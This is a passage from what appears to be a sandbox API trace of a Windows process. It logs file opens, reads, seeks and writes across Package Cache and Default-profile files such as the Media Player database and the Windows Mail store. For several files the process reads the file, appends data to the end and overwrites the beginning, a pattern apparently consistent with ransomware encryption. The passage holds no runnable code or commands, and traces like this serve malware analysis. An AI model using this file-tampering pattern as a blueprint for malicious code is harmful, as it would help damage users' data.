lpUsedDefaultChar=0x0) returned 24 [0182.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.VISIO_STD.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x1f8fc6c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.VISIO_STD.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0182.145] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x6e6, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x6e6, lpOverlapped=0x0) returned 1 [0182.145] CloseHandle (hObject=0x1dc) returned 1 [0182.145] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{13a4ee12-23ea-3371-91ee-efb36ddfff3e}v12.0.21005\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.145] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.145] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xf3c46 [0182.145] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.145] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.145] ReleaseMutex (hMutex=0x168) returned 1 [0182.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0182.145] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0182.146] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0182.146] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.146] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xf2c46 [0182.146] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.146] CloseHandle (hObject=0x1dc) returned 1 [0182.146] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.147] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.147] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x13c043 [0182.147] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.147] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.147] ReleaseMutex (hMutex=0x168) returned 1 [0182.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0182.147] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0182.147] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0182.147] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.148] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x13b043 [0182.148] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.148] CloseHandle (hObject=0x1dc) returned 1 [0182.148] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.148] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.148] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xfce92 [0182.148] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.148] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.148] ReleaseMutex (hMutex=0x168) returned 1 [0182.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0182.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0182.148] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0182.149] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.149] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xfbe92 [0182.149] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.149] CloseHandle (hObject=0x1dc) returned 1 [0182.149] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{cf2bea3c-26ea-32f8-aa9b-331f7e34ba97}v11.0.61030\\packages\\vcruntimeminimum_amd64\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.150] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.150] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0xc60ad [0182.150] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.150] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.150] ReleaseMutex (hMutex=0x168) returned 1 [0182.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0182.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="cab1.cab", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cab1.cab", lpUsedDefaultChar=0x0) returned 8 [0182.150] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0182.151] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.151] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0xc50ad [0182.151] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.151] CloseHandle (hObject=0x1dc) returned 1 [0182.151] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\users\\all users\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.151] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.151] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x886 [0182.151] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.152] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.152] ReleaseMutex (hMutex=0x168) returned 1 [0182.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0182.152] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="state.rsm", cchWideChar=9, lpMultiByteStr=0x1f733cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="state.rsm", lpUsedDefaultChar=0x0) returned 9 [0182.152] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a56c8, nNumberOfBytesToRead=0x886, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a56c8*, lpNumberOfBytesRead=0x2d5f2bc*=0x886, lpOverlapped=0x0) returned 1 [0182.152] CloseHandle (hObject=0x1dc) returned 1 [0182.152] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\Web Slice Gallery~.feed-ms" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\web slice gallery~.feed-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x7000 [0182.153] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.153] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.153] ReleaseMutex (hMutex=0x168) returned 1 [0182.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery~.feed-ms", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0182.153] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Web Slice Gallery~.feed-ms", cchWideChar=26, lpMultiByteStr=0x1f8fc6c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Web Slice Gallery~.feed-ms", lpUsedDefaultChar=0x0) returned 26 [0182.153] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.155] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6000 [0182.155] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.156] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x6000 [0182.156] WriteFile (in: hFile=0x1dc, lpBuffer=0x25ad838*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25ad838*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0182.157] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0182.157] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a3b48*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesWritten=0x2d5f28c*=0x1000, lpOverlapped=0x0) returned 1 [0182.157] CloseHandle (hObject=0x1dc) returned 1 [0182.157] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\LocalMLS_3.wmdb" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\localmls_3.wmdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.158] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.158] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x1106c [0182.158] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.158] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.158] ReleaseMutex (hMutex=0x168) returned 1 [0182.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalMLS_3.wmdb", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0182.158] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="LocalMLS_3.wmdb", cchWideChar=15, lpMultiByteStr=0x1f7356c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LocalMLS_3.wmdb", lpUsedDefaultChar=0x0) returned 15 [0182.158] ReadFile (in: hFile=0x1dc, lpBuffer=0x2663838, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesRead=0x2d5f278*=0x4000, lpOverlapped=0x0) returned 1 [0182.160] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1006c [0182.160] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2d5f278*=0x1000, lpOverlapped=0x0) returned 1 [0182.161] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2d5f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f2e8*=0) returned 0x1006c [0182.161] WriteFile (in: hFile=0x1dc, lpBuffer=0x26b4468*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x26b4468*, lpNumberOfBytesWritten=0x2d5f28c*=0x1588, lpOverlapped=0x0) returned 1 [0182.161] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f2bc*=0) returned 0x0 [0182.161] WriteFile (in: hFile=0x1dc, lpBuffer=0x2663838*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2d5f28c, lpOverlapped=0x0 | out: lpBuffer=0x2663838*, lpNumberOfBytesWritten=0x2d5f28c*=0x4000, lpOverlapped=0x0) returned 1 [0182.162] CloseHandle (hObject=0x1dc) returned 1 [0182.162] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.163] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.163] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x3fc [0182.163] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.163] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.163] ReleaseMutex (hMutex=0x168) returned 1 [0182.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="08_Video_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0182.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="08_Video_rated_at_4_or_5_stars.wpl", cchWideChar=34, lpMultiByteStr=0x1fa53fc, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="08_Video_rated_at_4_or_5_stars.wpl", lpUsedDefaultChar=0x0) returned 34 [0182.163] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e99d58, nNumberOfBytesToRead=0x3fc, lpNumberOfBytesRead=0x2d5f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99d58*, lpNumberOfBytesRead=0x2d5f2bc*=0x3fc, lpOverlapped=0x0) returned 1 [0182.165] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f300*=0) returned 0x0 [0182.165] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x984, lpNumberOfBytesWritten=0x2d5f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x2d5f2d0*=0x984, lpOverlapped=0x0) returned 1 [0182.165] CloseHandle (hObject=0x1dc) returned 1 [0182.165] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\Windows Mail\\Backup\\new\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\windows mail\\backup\\new\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0182.167] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.167] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x206000 [0182.167] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2d5f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2d5f8c0*=0) returned 0x0 [0182.167] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0182.168] ReleaseMutex (hMutex=0x168) returned 1 [0182.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0182.168] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMail.MSMessageStore", cchWideChar=26, lpMultiByteStr=0x1f8fc6c, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMail.MSMessageStore", lpUsedDefaultChar=0x0) returned 26 [0182.168] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0182.170] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2d5f278, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesRead=0x2d5f278*=0xf000, lpOverlapped=0x0) returned 1 [0182.172] ReadFile (in: hFile=0x1dc, lpBuffer=0x3cfcac8, nNumberOfBytesToRead=0x2000, 